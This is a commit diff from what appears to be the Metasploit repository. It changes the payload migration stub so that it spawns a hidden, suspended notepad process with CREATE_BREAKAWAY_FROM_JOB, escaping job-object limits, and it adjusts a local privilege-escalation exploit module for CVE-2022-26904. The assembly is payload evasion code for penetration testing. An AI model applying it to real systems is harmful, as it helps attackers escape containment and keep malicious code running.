Add in updated Ruby code and also update the DLLs and prepend_migrate…

….rb to use the CREATE_BREAKAWAY_FROM_JOB flag with CreateProcess to break away from the job if the job has the JOB_OBJECT_LIMIT_BREAKAWAY_OK limit set to allow breakaway jobs
talentsec · Mar 23, 2022 · b1ce05f · b1ce05f
1 parent 715082a
commit b1ce05f
Show file tree

Hide file tree

Showing 4 changed files with 5 additions and 5 deletions.
diff --git a/data/templates/template_x64_windows.dll b/data/templates/template_x64_windows.dll
diff --git a/data/templates/template_x86_windows.dll b/data/templates/template_x86_windows.dll
diff --git a/lib/msf/core/payload/windows/prepend_migrate.rb b/lib/msf/core/payload/windows/prepend_migrate.rb
@@ -57,7 +57,7 @@ def apply_prepend_migrate(buf)
   #
   def prepend_migrate(buf)
     payloadsize = "0x%04x" % buf.length
-    procname = datastore['PrependMigrateProc'] || 'rundll32'
+    procname = datastore['PrependMigrateProc'] || 'notepad'
 
     # Prepare instructions to get address of block_api into ebp
     block_api_start = <<-EOS
@@ -221,7 +221,7 @@ def prepend_migrate(buf)
       xor ebx,ebx
       push ebx                  ; lpCurrentDirectory
       push ebx                  ; lpEnvironment
-      push 0x08000004           ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED
+      push 0x09000004           ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED | CREATE_BREAKAWAY_FROM_JOB
       push ebx                  ; bInHeritHandles
       push ebx                  ; lpThreadAttributes
       push ebx                  ; lpProcessAttributes
@@ -300,7 +300,7 @@ def prepend_migrate(buf)
 
   def prepend_migrate_64(buf)
     payloadsize = "0x%04x" % buf.length
-    procname = datastore['PrependMigrateProc'] || 'rundll32'
+    procname = datastore['PrependMigrateProc'] || 'notepad'
 
     # Prepare instructions to get address of block_api into ebp
     block_api_start = <<-EOS
@@ -467,7 +467,7 @@ def prepend_migrate_64(buf)
       xor rcx,rcx
       push rcx                  ; lpCurrentDirectory
       push rcx                  ; lpEnvironment
-      push 0x08000004           ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED
+      push 0x09000004           ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED | CREATE_BREAKAWAY_FROM_JOB
       push rcx                  ; bInHeritHandles
       mov r9, rcx               ; lpThreadAttributes
       mov r8, rcx               ; lpProcessAttributes

diff --git a/modules/exploits/windows/local/cve_2022_26904_superprofile.rb b/modules/exploits/windows/local/cve_2022_26904_superprofile.rb
@@ -48,7 +48,7 @@ def initialize(info = {})
             'Grant Willcox' # Metasploit module + Tweaks to PoC
           ],
           'Arch' => [ ARCH_X64 ],
-          'Platform' => 'windows',
+          'Platform' => 'win',
           'SessionTypes' => [ 'meterpreter' ],
           'Targets' => [
             [ 'Windows 11', { 'Arch' => ARCH_X64 } ]